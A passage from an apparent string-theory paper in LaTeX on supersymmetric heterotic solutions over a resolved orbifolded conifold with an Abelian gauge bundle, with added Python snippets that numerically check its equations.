\frac{\mathrm{d} r^2}{f^2(r)} +
\frac{r^2}{6}\big(\mathrm{d}\theta_1^2+\sin^2\theta_1\,\mathrm{d}\phi_1^2 + \mathrm{d}\theta_2^2+\sin^2\theta_2\,\mathrm{d}\phi_2^2\big) \notag\\
& \hspace{2cm} +\,\frac{r^2}{9} f(r)^2 \big(\mathrm{d} \psi + \cos \theta_1 \,\mathrm{d} \phi_1 + \cos \theta_2 \,\mathrm{d} \phi_2 \big)^2 \biggr]\,,\\
\mathcal{H}_{[3]} & = \frac{\alpha'k}{6}\,g_1(r)^2\,\big( \Omega_1+\Omega_2\big)\wedge \tilde{\omega}_{[1]} \,,
\end{align}
\end{subequations}
with the volume forms of the two $S^2$s and the connection one-form $\tilde{\omega}_{[1]}$ defined by
\begin{subequations}
\begin{align}
\Omega_i&=\sin \theta_i \,\mathrm{d} \theta_i\wedge \mathrm{d} \phi_i\,,\quad \text{for }i=1,2\,,\qquad
\tilde{\omega}_{[1]} = \mathrm{d} \psi + \cos \theta_1 \,\mathrm{d} \phi_1 + \cos \theta_2 \,\mathrm{d} \phi_2\,.
\end{align}
\end{subequations}
In addition, non-zero \textsc{nsns} flux induces a nontrivial dilaton $\Phi(r)$, while satisfying the Bianchi identity requires an Abelian gauge bundle, which will be discussed below.
The resolved conifold geometry in~(\ref{sol-ansatz}a), denoted hereafter by $\tilde{\mathcal{C}}_6$, is topologically equivalent to the
total space of the line bundle $\mathcal{O}(-K)\rightarrow \mathbb{C} P^1 \times \mathbb{C} P^1$. The resolution of the singularity is governed by the
function $f(r)$ responsible for the squashing of $T^{1,1}$. Indeed the zero locus of this function defines the blowup mode $a$ of the conifold,
related to the product of the volumes of the two $\mathbb{C} P^1$'s.
Asymptotically in $r$, the numerical solutions that will be found below are such that both $f$ and $H$ tend to constant values,
according to $\text{lim}_{r\rightarrow \infty}f=1$ and $\text{lim}_{r\rightarrow \infty} H=H_{\infty}$, hence the known Ricci-flat conifold metric is restored at infinity (however without
the standard embedding of the spin connexion in the gauge connexion, see below).
To determine the background explicitly, we impose the supersymmetry conditions~(\ref{susy-cond}) and the Bianchi identity~(\ref{bianchi}) on the ansatz~(\ref{sol-ansatz}),
which implies~\cite{deWit:1986xg,Gauntlett:2002sc} that the equations of motion for the Lagrangian~(\ref{het-lag-sugra}) are solved. In addition, one has to implement the condition~(\ref{Kth}),
thereby constraining the magnetic charges specifying the Abelian gauge bundle.
\subsection{The supersymmetry equations}
To make use of the supersymmetry equations~(\ref{susy-cond}) and the calibration condition for the flux~(\ref{eqH}), we choose the following complexification of the vielbein:
\begin{equation}\label{complex-vielbein}
E^1=e^2+ie^3\,, \qquad E^2=e^4+ie^5\,, \qquad E^3=e^1+ie^6\,,
\end{equation}
written in terms of the left-invariant one-forms on $T^{1,1}$:
\begin{equation}\label{vielbn}
\begin{array}{ll}
e^1=\sqrt{\frac{3H}{2}}\frac1f\,\mathrm{d} r\, &
\quad e^6= \frac{r\sqrt{H}f}{\sqrt{6}}\,\tilde\omega\\[5pt]
e^2= \frac{r \sqrt{H}}{2}\,\big(\sin\frac{\psi}{2}\,\mathrm{d} \theta_1- \cos\frac{\psi}{2}\sin\theta_1\,\mathrm{d}\phi_1\big)\,, &\quad
e^3= -\frac{r\sqrt{H}}{2}\,\big(\cos\frac{\psi}{2}\,\mathrm{d} \theta_1+ \sin\frac{\psi}{2}\sin\theta_1\,\mathrm{d}\phi_1\big)\,, \\[5pt]
e^4= \frac{r\sqrt{H}}{2}\,\big(\sin\frac{\psi}{2}\,\mathrm{d} \theta_2- \cos\frac{\psi}{2}\sin\theta_2\,\mathrm{d}\phi_2\big) \,,& \quad
e^5= -\frac{r\sqrt{H}}{2}\,\big(\cos\frac{\psi}{2}\,\mathrm{d} \theta_2+ \sin\frac{\psi}{2}\sin\theta_2\,\mathrm{d}\phi_2\big)\,.
\end{array}
\end{equation}
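As a quick numerical cross-check (ours, not part of the paper), one can verify that $\sum_i e^i\otimes e^i$ built from the frame~(\ref{vielbn}) reproduces the internal part of the metric ansatz~(\ref{sol-ansatz}a); the sample point and the values of $H$ and $f$ below are arbitrary:

```python
import math

# Sanity check: the vielbein e^1..e^6 should reproduce the internal metric
# of the ansatz via g = sum_i e^i (x) e^i.
# Coordinate basis order: (dr, dtheta1, dphi1, dtheta2, dphi2, dpsi).

def vielbein(r, th1, th2, psi, H, f):
    c = r * math.sqrt(H) / 2                      # common S^2 prefactor
    s, co = math.sin(psi / 2), math.cos(psi / 2)
    c6 = r * math.sqrt(H) * f / math.sqrt(6)      # fibre prefactor
    return [
        [math.sqrt(1.5 * H) / f, 0, 0, 0, 0, 0],                 # e^1
        [0,  c * s, -c * co * math.sin(th1), 0, 0, 0],           # e^2
        [0, -c * co, -c * s * math.sin(th1), 0, 0, 0],           # e^3
        [0, 0, 0,  c * s, -c * co * math.sin(th2), 0],           # e^4
        [0, 0, 0, -c * co, -c * s * math.sin(th2), 0],           # e^5
        [0, 0, c6 * math.cos(th1), 0, c6 * math.cos(th2), c6],   # e^6
    ]

def metric_from_vielbein(es):
    return [[sum(e[i] * e[j] for e in es) for j in range(6)] for i in range(6)]

def metric_ansatz(r, th1, th2, H, f):
    g = [[0.0] * 6 for _ in range(6)]
    pre = 1.5 * H
    g[0][0] = pre / f**2
    g[1][1] = g[3][3] = pre * r**2 / 6
    g[2][2] = pre * r**2 / 6 * math.sin(th1)**2
    g[4][4] = pre * r**2 / 6 * math.sin(th2)**2
    omega = [0, 0, math.cos(th1), 0, math.cos(th2), 1]  # fibre one-form
    for i in range(6):
        for j in range(6):
            g[i][j] += pre * r**2 / 9 * f**2 * omega[i] * omega[j]
    return g

# compare at a generic point
r, th1, th2, psi, H, f = 1.3, 0.7, 1.1, 0.9, 2.4, 0.8
gv = metric_from_vielbein(vielbein(r, th1, th2, psi, H, f))
ga = metric_ansatz(r, th1, th2, H, f)
err = max(abs(gv[i][j] - ga[i][j]) for i in range(6) for j in range(6))
print(err)   # zero up to floating-point rounding
```

The agreement is exact up to floating-point rounding.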
The corresponding $SU(3)$ structure then reads:
\begin{subequations}
\label{complexbasis}
\begin{align}
\Omega_{[3,0]} &= E^1\wedge E^2 \wedge E^3 \equiv e^{124}-e^{135}-e^{256}-e^{346}+i
\big(e^{125}+e^{134}+e^{246}-e^{356}\big)\,, \\
J_{[1,1]} &=\frac{i}{2} \sum_{a=1}^3 E^a\wedge \bar E^a \equiv e^{16}+e^{23}+e^{45}\,.
\end{align}
\end{subequations}
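The relations~(\ref{topcond}) and the component expansion~(\ref{complexbasis}) can be verified by brute-force exterior algebra (an illustrative sketch of ours, with forms stored as dictionaries over ascending frame-index tuples):

```python
# Verify the SU(3)-structure relations J ^ Omega = 0 and
# Omega ^ Omega-bar = -(4i/3) J ^ J ^ J over the real frame e^1,...,e^6.

def wedge(a, b):
    """Wedge product of forms stored as {ascending index tuple: coefficient}."""
    out = {}
    for ia, ca in a.items():
        for ib, cb in b.items():
            idx = list(ia + ib)
            if len(set(idx)) != len(idx):
                continue                  # repeated basis one-form -> zero
            sign = 1                      # bubble-sort indices, tracking parity
            for i in range(len(idx)):
                for j in range(len(idx) - 1 - i):
                    if idx[j] > idx[j + 1]:
                        idx[j], idx[j + 1] = idx[j + 1], idx[j]
                        sign = -sign
            key = tuple(idx)
            out[key] = out.get(key, 0) + sign * ca * cb
    return {k: v for k, v in out.items() if abs(v) > 1e-12}

conj = lambda a: {k: complex(v).conjugate() for k, v in a.items()}

# complexified vielbein: E^1 = e2 + i e3, E^2 = e4 + i e5, E^3 = e1 + i e6
E1, E2, E3 = {(2,): 1, (3,): 1j}, {(4,): 1, (5,): 1j}, {(1,): 1, (6,): 1j}
Omega = wedge(wedge(E1, E2), E3)

J = {}
for Ea in (E1, E2, E3):                   # J = (i/2) sum_a E^a ^ Ebar^a
    for k, v in wedge(Ea, conj(Ea)).items():
        J[k] = J.get(k, 0) + 0.5j * v

print(sorted(J))                          # [(1, 6), (2, 3), (4, 5)] : e16 + e23 + e45
print(wedge(J, Omega))                    # {} : J ^ Omega = 0
J3 = wedge(wedge(J, J), J)
lhs = wedge(Omega, conj(Omega))           # Omega ^ Omega-bar
diff = {k: lhs.get(k, 0) + (4j / 3) * J3.get(k, 0) for k in set(lhs) | set(J3)}
print(max(abs(v) for v in diff.values()))  # zero up to rounding
```

The same computation also reproduces the components of $\Omega$ listed in~(\ref{complexbasis}), e.g.\ the coefficients of $e^{124}$ and $e^{135}$.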
Imposing the supersymmetry conditions~(\ref{susy-cond}) leads to the following system of first-order differential equations:
\begin{subequations} \label{susy-system}
\begin{align}
&f^2 H' = f^2 H\,\Phi' = -\frac{2\alpha'k \,g_1^2}{r^3} \,,\\
&r^3H f f'+3r^2 H\,(f^2-1) +\alpha'k\, g_1^2=0\,.
\end{align}
\end{subequations}
\subsection{The Abelian gauge bundle}
To solve the Bianchi identity~(\ref{bianchi}), at least in the large charge limit, one can consider an Abelian gauge bundle,
supported both on the four-cycle $\mathbb{C} P^1\times \mathbb{C} P^1$ and on the $S^1$ fiber of the squashed $T^{1,1}/\mathbb{Z}_2$:
\begin{equation}\label{gauge-ansatz}
\mathcal{A}_{[1]}=\tfrac{1}{4}\Big(\left(\cos\theta_1\,\mathrm{d}\phi_1 - \cos \theta_2\,\mathrm{d} \phi_2 \right)\vec{p} + g_2(r)\,\tilde\omega\,\vec{q}\Big) \cdot \vec{H}\,,
\end{equation}
where $\vec{H}$ spans the 16-dimensional Cartan subalgebra of $\mathfrak{so}(32)$ and the $H^i$, $i=1,..,16$, are chosen anti-Hermitian, with Killing
form $K(H^i,H^j)=-2\delta_{ij}$. The solution is characterized by two {\it shift vectors}\footnote{This terminology is borrowed from the
orbifold limit of some line bundles over singularities, see $e.g.$~\cite{Nibbelink:2007rd}.} $\vec{p}$ and $\vec{q}$ that
specify the Abelian gauge bundle and are required to satisfy $\vec{p}\cdot\vec{q}=0$. The function $g_2(r)$
will be determined by the \textsc{duy} equations.
The choice~(\ref{gauge-ansatz}) is the most general ansatz for a line bundle over the manifold~(\ref{sol-ansatz}a)
satisfying the holomorphicity condition~(\ref{hym}a). Then, to fulfil the remaining supersymmetry condition, we rewrite:
\begin{equation}\label{FS}
\begin{array}{rcl}
\mathcal{F}_{[2]} & = &
{\displaystyle -\tfrac{1}{4} \Big[\big(\Omega_1-\Omega_2\big)\,\vec{p}
+\big( g_2(r)(\Omega_1+\Omega_2)
-g_2'(r)\,\mathrm{d} r\wedge \tilde{\omega}\big)\,\vec{q} \,\Big]\cdot \vec{H} } \\[7pt]
& =& -{\displaystyle \frac{i}{r^2H}\Big[
\big(E^1\wedge \bar E^1 - E^2\wedge \bar E^2 \big)\,\vec{p} +
\big( g_2 \,(E^1\wedge \bar E^1 + E^2\wedge \bar E^2) + \tfrac12 rg_2'\, E^3\wedge \bar
E^3\big)\vec q
\,\Big] \cdot \vec{H}}
\end{array}
\end{equation}
so that imposing (\ref{hym}b) fixes:
\begin{equation}\label{g2-prof}
g_2(r)=\left(\frac a r\right)^4 \,.
\end{equation}
In defining this function we have introduced a scale $a$ which is so far a free real parameter of the solution.
It will become clear later on that $a$ is the blow-up mode related to the unwarped volume of the four-cycle.
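To make the step from~(\ref{hym}b) to~(\ref{g2-prof}) explicit (a sketch of our own): tracing the $\vec{q}$-part of the second line of~(\ref{FS}) with $J$ gives $2g_2+\tfrac{r}{2}\,g_2'=0$, i.e.\ $r\,g_2'=-4g_2$, whose solution decaying at infinity is precisely $g_2=(a/r)^4$:

```python
# Check that g2(r) = (a/r)^4 solves the traced DUY condition
#   2*g2(r) + (r/2)*g2'(r) = 0 .

def g2(r, a):
    return (a / r) ** 4

def g2_prime(r, a):
    return -4 * a**4 / r**5

a = 1.7
residuals = [abs(2 * g2(r, a) + 0.5 * r * g2_prime(r, a))
             for r in (2.0, 3.5, 10.0)]
print(max(residuals))   # zero up to rounding
```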
The function (\ref{g2-prof}) can also be determined in an alternative fashion by observing that the standard singular Ricci-flat conifold possesses two harmonic two-forms, which are also shared by the
resolved geometry $\tilde{\mathcal{C}}_6$ (see~\cite{Lu:2002rk} for a similar discussion about the Ricci-flat orbifoldized conifold), where they can be written locally as:
\begin{equation}\label{2form}
\varpi_1 = \frac{1}{4\pi}\,\mathrm{d}\big(\cos\theta_1\,\mathrm{d}\phi_1 - \cos \theta_2\,\mathrm{d} \phi_2\big)\,,\qquad
\varpi_2 = \frac{a^4}{4\pi}\,\mathrm{d}\left( \frac{\tilde\omega}{r^4}\right)\,,
\end{equation}
and form a base of two-forms that completely span the gauge field strength:
\begin{equation}\label{F-tf}
\mathcal{F}= \pi\big( \varpi_1\,\vec{p}+ \varpi_2\,\vec{q}\,\big)\cdot \vec{H}\,.
\end{equation}
Note in particular that $\varpi_2$ is normalizable on the warped resolved conifold, while $\varpi_1$ is not, since we have
\begin{equation}
(4\pi)^2\varpi_m \wedge \star_6 \varpi_m =h_m(r)\,\mathrm{d} r\wedge\Omega_1\wedge \Omega_2\wedge \mathrm{d}\psi
\end{equation}
characterized by the functions
\begin{equation}
h_1(r)= r H(r)\,,\qquad h_2(r)= \frac{3 a^8 H(r)}{r^7}\,
\end{equation}
and the conformal factor $H$ is monotonically decreasing, has no pole at $r=a$, and is asymptotically constant. Thus, contrary to the four-dimensional heterotic solution with a line bundle over warped
Eguchi-Hanson space~\cite{Carlevaro:2008qf}, the fact that the $\varpi_1$ component of the gauge field is non-normalizable implies that $\mathcal{F}$ carries a non-vanishing charge at infinity, due
to $\int_{\infty}\varpi_1\neq 0$.
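The (non-)normalizability of $\varpi_1$ and $\varpi_2$ is easy to illustrate numerically (a sketch assuming, for simplicity, $H\equiv 1$, which mimics the bounded, non-vanishing conformal factor of the actual solution):

```python
# Integrate the norm densities h1 = r H and h2 = 3 a^8 H / r^7 with H = 1:
# the h2 integral converges (to a^2/2) while the h1 integral grows without bound.

def integrate(h, lo, hi, n=200000):
    # simple midpoint rule on [lo, hi]
    dr = (hi - lo) / n
    return sum(h(lo + (i + 0.5) * dr) for i in range(n)) * dr

a = 1.0
h1 = lambda r: r                      # ~ R^2/2 : divergent as R -> infinity
h2 = lambda r: 3 * a**8 / r**7        # -> a^2/2 : convergent

for R in (10.0, 100.0):
    print(R, integrate(h1, a, R), integrate(h2, a, R))
```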
\subsubsection*{Constraints on the first Chern class of the bundle}
The magnetic fields arising from the gauge background~(\ref{FS}) lead to Dirac-type quantization conditions associated with the compact two-cycles of the geometry.
We first observe that the second homology $H_2(\tilde{\mathcal{C}}_6,\mathbb{R})$ of the resolved conifold is spanned by two representative two-cycles
related to the two blown-up $\mathbb{C} P^1$s pinned at the bolt of $\tilde{\mathcal{C}}_6$:
\begin{equation}
\Sigma_i=\{r=a,\theta_i=\text{const},\phi_i=\text{const},\psi=0\}\,,\quad i=1,2\,.
\end{equation}
One then constructs a dual basis of two-forms, by taking the appropriate combinations of the harmonic two-forms~(\ref{2form}):
\begin{equation}\label{cohom}
L_1 = \tfrac12\big(\varpi_2 -\varpi_1\big)\,,\qquad
L_2 = \tfrac12\big(\varpi_1 +\varpi_2\big)\,,
\end{equation}
which span the second cohomology $H^2(\tilde{\mathcal{C}}_6,\mathbb{R})=\mathbb{R}\oplus\mathbb{R}$.\footnote{The K\"ahler form $J$, being non-integrable, is
absent from the second cohomology of $\tilde{\mathcal{C}}_6$.} Expanding the gauge field strength~(\ref{F-tf}) on the cohomology basis~(\ref{cohom}), one gets
\begin{equation}
\int_{\Sigma_{1}} \frac{\mathcal{F}}{2\pi} = \frac{1}{2} (\vec{q}-\vec{p})\cdot \vec{H} \quad , \qquad
\int_{\Sigma_{2}} \frac{\mathcal{F}}{2\pi} = \frac{1}{2} (\vec{q}+\vec{p})\cdot \vec{H} \, .
\end{equation}
Imposing a Dirac quantization condition for the adjoint (two-index) representation leads to the possibilities
\begin{align}\label{constr-shiftvect}
&q_\ell\pm p_\ell \equiv 0 \mod 2 \qquad \forall \ell=1,\ldots,16\,, \qquad \text{or} \nonumber \\
&q_\ell \pm p_\ell \equiv 1 \mod 2 \qquad \forall \ell=1,\ldots,16 \, ,
\end{align}
$i.e.$ the vectors $(\vec{p}\pm \vec{q})/2$ have either all entries integer or all entries half-integer.
The former corresponds to bundles 'with vector structure' and the latter to bundles 'without vector structure'~\cite{Berkooz:1996iz}.
The distinction between these types of bundles is given by the generalized Stiefel-Whitney class $\tilde{w}_2 (V)$, measuring the obstruction to associate the
bundle $V$ with an $SO(32)$ bundle.
The vectors $\vec{p}$ and $\vec{q}$ being orthogonal, we choose them to be of the form
$\vec{p}=(p_\ell,0^{n})$ with $\ell=1,\ldots,16-n$ and
$\vec{q}=(0^{16-n},q_\ell)$ with $\ell=16-n+1,\ldots,16$. This gives the separate conditions
\begin{equation}
\left\{
\begin{array}{lr}
q_\ell \equiv 0 \mod 2 \ , \ \ p_\ell \equiv 0 \mod 2 \, , & \quad\text{for} \quad \tilde{w}_2 (V) = 0 \, ,\\[4pt]
q_\ell \equiv 1 \mod 2 \ , \ \ p_\ell \equiv 1 \mod 2 \, , & \quad \text{for} \quad\tilde{w}_2 (V) \neq 0\, ,
\end{array}
\right. \qquad \forall \ell\, .
\label{constr-pandq}
\end{equation}
In addition, as the heterotic string spectrum contains massive states transforming in the spinorial representation of $Spin(32)$ of, say, positive chirality, the shift vectors $\vec p$ and $\vec q$ specifying
the gauge field bundle~(\ref{FS}) have to satisfy the extra constraint~(\ref{Kth}). It yields two conditions:
\begin{equation}\label{Kth2}
\sum_{\ell=1}^{16}\, (p_\ell \pm q_\ell) \equiv 0 \text{ mod }4\, ,
\end{equation}
which are in fact equivalent for bundles with vector structure. In section~\ref{wnpe}, these specific constraints will be re-derived from non-perturbative corrections to the worldsheet theory.
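The constraints~(\ref{constr-pandq}) and~(\ref{Kth2}), together with the orthogonality $\vec{p}\cdot\vec{q}=0$, can be bundled into a small admissibility check (the helper and the example charge vectors below are ours, not from the paper):

```python
# Check candidate shift vectors against: orthogonality p.q = 0, the Dirac
# parity conditions (all q +/- p entries even, or all odd), and the
# worldsheet/K-theory constraint sum(p +/- q) = 0 mod 4.

def admissible(p, q):
    if sum(pi * qi for pi, qi in zip(p, q)) != 0:
        return False
    plus  = [pi + qi for pi, qi in zip(p, q)]
    minus = [pi - qi for pi, qi in zip(p, q)]
    parity_ok = (all(x % 2 == 0 for x in plus + minus)       # with vector structure
                 or all(x % 2 == 1 for x in plus + minus))   # without vector structure
    return parity_ok and sum(plus) % 4 == 0 and sum(minus) % 4 == 0

p, q = (2,) * 8 + (0,) * 8, (0,) * 8 + (2,) * 8              # p^2 = q^2 = 32
print(admissible(p, q))                                      # True  (vector structure)
print(admissible((1,) * 8 + (0,) * 8, (0,) * 8 + (1,) * 8))  # True  (no vector structure)
print(admissible((1,) + (0,) * 15, (0, 2) + (0,) * 14))      # False (mixed parity)
```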
\subsection{The Bianchi identity at leading order}
\label{bianchisect}
To determine the radial profile of the three-form $\mathcal{H}$, $i.e.$ the function $g_1(r)$ in the ansatz~(\ref{sol-ansatz}), we need to solve the
Bianchi identity (\ref{bianchi}); this is generally a difficult task. In the large-charge limit $\vec{p}^{\, 2} \gg 1$ (corresponding, in the blow-down limit, to
considering the back-reaction of a large number of wrapped heterotic five-branes, see later), the tree-level contribution to the \textsc{rhs} of the Bianchi identity is
dominant and the higher-derivative (curvature) term can be neglected. Using the gauge field strength ansatz~(\ref{FS}), equation~(\ref{bianchi}) becomes:
\begin{equation}\label{Bianchi1}
\frac{1}{\alpha'}\, \mathrm{d} \mathcal{H}_{[3]} =
{\displaystyle \frac{1}{4}\Big(\big[\vec{q}^{\, 2} g_2^2 -\vec{p}^{\, 2}\big]\,\Omega_1\wedge\Omega_2 -
\vec{q}^{\, 2}\, g_2\, g_2'\,\mathrm{d} r\wedge\big(\Omega_1+\Omega_2\big)\wedge\tilde\omega\Big) + \mathcal{O}\left(1\right)}\, .
\end{equation}
Then, using the solution of the \textsc{duy} equations~(\ref{g2-prof}), we obtain:
\begin{equation}\label{g3}
g_1^2(r)=\tfrac34\big[1-g_2^2(r)\big]=
\tfrac34\Big[1-\left(\frac{a}{r}\right)^8\Big]
\end{equation}
and the norms of the shift vectors are constrained to satisfy:
\begin{equation}\label{pqk}
\vec{p}^{\, 2} = \,\vec{q}^{\, 2} = k\,,
\end{equation}
such that the tree-level $F^2$ term on the \textsc{rhs} of the Bianchi identity~(\ref{Bianchi1}) is
indeed the leading contribution. The relevance of one-loop corrections to $\mathcal{H}$ coming from generalized Lorentz Chern-Simons couplings~(\ref{CSform}) will be discussed below.
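The consistency of~(\ref{g3}) and~(\ref{pqk}) can be re-checked component by component (our own rederivation sketch, using $\mathrm{d}\tilde\omega=-(\Omega_1+\Omega_2)$ and setting $\alpha'=1$): matching $\mathrm{d}\mathcal{H}$ against~(\ref{Bianchi1}) requires $-(k/3)\,g_1^2=\tfrac14(\vec{q}^{\,2}g_2^2-\vec{p}^{\,2})$ and $(k/6)\,(g_1^2)'=-\tfrac14\,\vec{q}^{\,2}g_2 g_2'$, both solved by~(\ref{g3}) when $\vec{p}^{\,2}=\vec{q}^{\,2}=k$:

```python
# Component-by-component check of the leading-order Bianchi identity:
#   -(k/3) g1^2    = (1/4) (q^2 g2^2 - p^2)     [Omega_1 ^ Omega_2 part]
#    (k/6) (g1^2)' = -(1/4) q^2 g2 g2'          [dr ^ (...) ^ omega part]
# with g1^2 = (3/4)(1 - g2^2) and g2 = (a/r)^4, for p^2 = q^2 = k.

k, a = 100.0, 1.3

g2    = lambda r: (a / r) ** 4
dg2   = lambda r: -4 * a**4 / r**5
g1sq  = lambda r: 0.75 * (1 - g2(r) ** 2)
dg1sq = lambda r: -1.5 * g2(r) * dg2(r)

res = []
for r in (1.5, 2.0, 5.0, 20.0):
    res.append(abs(-(k / 3) * g1sq(r) - 0.25 * (k * g2(r)**2 - k)))
    res.append(abs((k / 6) * dg1sq(r) + 0.25 * k * g2(r) * dg2(r)))
print(max(res))   # zero up to rounding
```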
Finally, one can define a quantized five-brane charge, as asymptotically the geometry is given by a cone over
$T^{1,1}/\mathbb{Z}_2 \sim \mathbb{R} P_3\times S^2$:
\begin{equation}\label{N5flux}
Q_5 = \frac{1}{2\pi^2 \alpha'} \int_{\mathbb{R} P_3 , \, \infty}\!\!\!\!\!\! \mathcal{H}_{[3]} \, = \frac{k}{2} \, .
\end{equation}
\subsubsection*{The orbifold of the conifold}
Having determined the functions $g_1(r)$ and $g_2(r)$ governing the $r$ dependence of the torsion three-form and of the gauge bundle
respectively, one can already make an important observation. Since the function $g_1(r)$ given in (\ref{g3}) vanishes at $r=a$, assuming that the
conformal factor $H(r)$ and its derivative do not vanish there (this will be confirmed by the subsequent numerical analysis),
eq.~(\ref{susy-system}a) implies that the squashing function $f^2(r)$ also vanishes for $r=a$. Therefore the manifold exhibits a
$\mathbb{C}P^1\times \mathbb{C}P^1$ bolt, with possibly a conical singularity.
Then, evaluating the second supersymmetry condition (\ref{susy-system}b) at the bolt (where both $f^2$ and $g_1$ vanish),
we find that $(f^2)' |_{r\to a_+} = \nicefrac{6}{a}$. With this precise first order expansion of $f^2$ near the bolt,
the conical singularity can be removed by restricting the periodicity of the $S^1$ fiber in $T^{1,1}$, as $\psi\sim\psi + 2\pi$ instead of
the original $\psi\in[0,4\pi[$. In other words we need to consider a $\mathbb{Z}_2$ orbifold of the conifold, as studied e.g. in~\cite{Bershadsky:1995sp} in
the Ricci-flat torsionless case.
Following the same argument as in~\cite{PandoZayas2}, the deformation parameter $a$ can be related to the volume of the blown-up four-cycle $\mathbb{C} P^1\times \mathbb{C} P^1$,
and thus represents a {\it local} K\"ahler deformation.
One may wonder whether this analysis can be spoiled by the higher-order $\alpha'$ corrections (as we solved only the Bianchi identity at leading order).
However we will prove in the following that the $\mathbb{Z}_2$ orbifold is also necessary in the full-fledged heterotic worldsheet theory.
\subsection{Numerical solution}
Having analytical expressions for the functions $g_1$ and $g_2$, we can now solve the first-order
system~(\ref{susy-system}), which arises from the supersymmetry conditions, for the remaining functions $f$ and $H$.
If we require the conformal factor $H$ to be asymptotically constant, as expected from a brane-type solution in
supergravity, the system~(\ref{susy-system}) can only be solved numerically.
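As an illustration of such a numerical integration (a minimal sketch of ours, with $\alpha'=1$ and arbitrary values $k=1$, $a=1$, $H(a)=5$), one can integrate~(\ref{susy-system}) outward from the bolt with the regular data $f^2(a)=0$, $(f^2)'(a)=6/a$ and the profile $g_1^2$ of~(\ref{g3}):

```python
# RK4 integration of the first-order system (susy-system), alpha' = 1:
#   (f^2)' = -2 [ 3 r^2 H (f^2 - 1) + k g1^2 ] / (r^3 H)
#   H'     = -2 k g1^2 / (r^3 f^2),   g1^2 = (3/4)(1 - (a/r)^8).
# We check that f^2 -> 1 (Ricci-flat cone) and that H decreases to a constant.

k, a = 1.0, 1.0

def g1sq(r):
    return 0.75 * (1 - (a / r) ** 8)

def derivs(r, y):
    u, H = y                                  # u = f^2
    du = -2 * (3 * r**2 * H * (u - 1) + k * g1sq(r)) / (r**3 * H)
    dH = -2 * k * g1sq(r) / (r**3 * u)
    return du, dH

def rk4(r, y, h):
    k1 = derivs(r, y)
    k2 = derivs(r + h / 2, [y[i] + h / 2 * k1[i] for i in (0, 1)])
    k3 = derivs(r + h / 2, [y[i] + h / 2 * k2[i] for i in (0, 1)])
    k4 = derivs(r + h, [y[i] + h * k3[i] for i in (0, 1)])
    return [y[i] + h / 6 * (k1[i] + 2 * k2[i] + 2 * k3[i] + k4[i]) for i in (0, 1)]

delta = 1e-6
r, y = a * (1 + delta), [6 * delta, 5.0]      # u ~ (6/a)(r - a), H(a) = 5 (arbitrary)
Hs = [y[1]]
while r < 60.0:
    h = 1e-3 if r < 2.0 else 1e-2             # finer steps near the bolt
    y = rk4(r, y, h)
    r += h
    Hs.append(y[1])

print(y[0])                                   # f^2 close to 1 at large r
print(all(h2 <= h1 for h1, h2 in zip(Hs, Hs[1:])) and Hs[-1] > 0)  # True
```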
\begin{figure}[!t]
\centering
\includegraphics[width=75mm]{tab1.pdf}\hskip5mm
\includegraphics[width=75mm]{tab2.pdf}
\caption{Numerical solution for $f^2(r)$ and $H(r)$, with the choice of parameters $k=10000$ and $a^2/\alpha'k=\{0.0001,0.01,1\}$, respectively thick, thin and dashed lines.}
\label{tab1}
\end{figure}
In figure~\ref{tab1}, we represent a family of such solutions with conformal
factor having the asymptotics:
\begin{equation}\label{Hprofile}
H(r) \stackrel{r\to a^+}{\sim} 1+\frac{\alpha'k}{r^2}\,,\qquad \lim_{r\rightarrow \infty }H(r)=H_{\infty}\, ,
\end{equation}
and a function $f^2$ vanishing at the bolt $r=a$ (where the blow-up parameter $a$ has been fixed previously in defining the gauge bundle).
The dilaton is then determined by the conformal factor, up to a constant, by integrating eq.(\ref{susy-system}a):
\begin{equation}\label{ephi}
e^{2\Phi(r)}=e^{2\Phi_0}H(r)^2\,.
\end{equation}
We observe in particular that since $\lim_{r\to \infty} f^2=1$, the solution interpolates between the squashed resolved conifold at finite $r$ and the usual cone
over the Einstein space $T^{1,1}/\mathbb{Z}_2$ at infinity, thus restoring a Ricci-flat
background asymptotically. In figure~\ref{tab1} we also note that in the regime where $a^2$ is small compared to $\alpha'k$, the function
$f^2$ develops a saddle point that disappears when their ratio tends to one.
As expected from this type of torsional backgrounds, in the blow-down limit the gauge bundle associated with $\vec{q}$ becomes a kind of point-like instanton,
leading to a five-brane-like solution. The appearance of five-branes manifests itself through a singularity of the conformal factor $H$, hence of the dilaton, in
the $r\to0$ limit. In this limit the solution behaves as the backreaction of heterotic five-branes wrapping some supersymmetric vanishing
two-cycle, together with a gauge bundle turned on. As we will see later on this singularity is not smoothed out by the $\mathcal{R}^2$ curvature correction to the
Bianchi identity.
\subsection{Analytical solution in the double-scaling limit}
\label{sec:analytic}
The regime $a^2/\alpha'k\ll 1$ in parameter space allows for a limit where the system~(\ref{susy-system}) admits an analytical solution, which corresponds to a sort of 'near-bolt' or
throat geometry of the family of torsional backgrounds seen above.\footnote{In the blow-down limit where the bundle degenerates to a wrapped five-brane-like solution, this regime should be called a 'near-brane' geometry.}
This solution is valid in the coordinate range:
\begin{equation}
a^2\leqslant r^2 \ll \alpha' k \,.
\end{equation}
Note that this is not a 'near-singularity' regime as the location $a$ of the bolt is chosen hierarchically smaller than the scale $\sqrt{\alpha' k}$ at which
one enters the throat region.
This geometry can be extended to a full solution of heterotic supergravity by means of a {\it double scaling limit}, defined as
\begin{equation}
\label{DSL}
g_s \to 0 \,, \qquad\qquad \mu=\frac{g_s \alpha'}{a^2} \quad \text{fixed}\,,
\end{equation}
where the asymptotic string coupling $g_s=e^{\Phi_0}H_{\infty}$ is set by the $r\to\infty$ limit of expression~(\ref{ephi}).
This isolates the dynamics near the four-cycle of the resolved singularity, without going to the blow-down limit, i.e. keeping
the transverse space to be conformal to the non-singular resolved conifold.\footnote{For this limit to make sense, one needs to check
that the asymptotic value of the conformal factor $H_\infty$ stays of order one in this regime. We checked with the numerical
solution that this is indeed the case.}
One obtains an interacting theory whose effective string coupling constant is set by the double-scaling parameter $\mu$.
The metric is determined by solving (\ref{susy-system}) in this limit, yielding
the analytic expressions:
\begin{equation}\label{Hfg}
H(r)=\frac{\alpha'k}{r^2}\,,\qquad f^2(r)=g_1^2(r)=\tfrac{3}{4}\Big[1-\left(\frac{a}{r}\right)^8\Big]\, .
\end{equation}
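One can check directly (our own verification, with $\alpha'=1$) that the profiles~(\ref{Hfg}) solve the system~(\ref{susy-system}) exactly, and not only in the throat regime:

```python
# Residuals of (susy-system) for H = k / r^2, f^2 = g1^2 = (3/4)(1 - (a/r)^8);
# Phi' = H'/H follows from e^{2 Phi} = e^{2 Phi_0} H^2, so eq. (a) collapses
# to a single condition.

k, a = 7.0, 1.2

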